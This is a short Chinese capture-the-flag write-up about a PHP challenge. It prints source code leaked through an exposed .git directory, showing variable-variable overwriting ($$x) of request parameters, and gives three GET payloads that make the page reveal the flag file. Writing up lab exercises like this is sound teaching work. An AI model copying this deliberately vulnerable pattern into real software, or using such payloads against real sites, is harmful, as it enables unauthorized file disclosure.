知识点

  • .git源码泄露
  • $$变量覆盖

启动靶机

.git源码泄露得到源码:
index.php

  1. <?php
  3. include 'flag.php';
  5. $yds = "dog";
  6. $is = "cat";
  7. $handsome = 'yds';
  9. foreach($_POST as $x => $y){
  10.     $$x = $y;
  11. }
  13. foreach($_GET as $x => $y){
  14.     $$x = $$y;
  15. }
  17. foreach($_GET as $x => $y){ 
  18.     if($_GET['flag'] === $x && $x !== 'flag'){
  19.         exit($handsome);
  20.     }
  21. }
  23. if(!isset($_GET['flag']) && !isset($_POST['flag'])){
  24.     exit($yds);
  25. }
  27. if($_POST['flag'] === 'flag'  || $_GET['flag'] === 'flag'){
  28.     exit($is);
  29. }
  32. echo "the flag is: ".$flag;

flag.php

  1. <?php
  3. $flag = file_get_contents('/flag');

Payload

最终构造payload:

  1. 方法一:利用 exit($yds)
  2. GETyds=flag
  4. 方法二:利用 exit($is)
  5. GETis=flag&flag=flag
  7. 方法三:利用exit($handsome)
  8. GETa=flag&flag=a&handsome=flag

image.png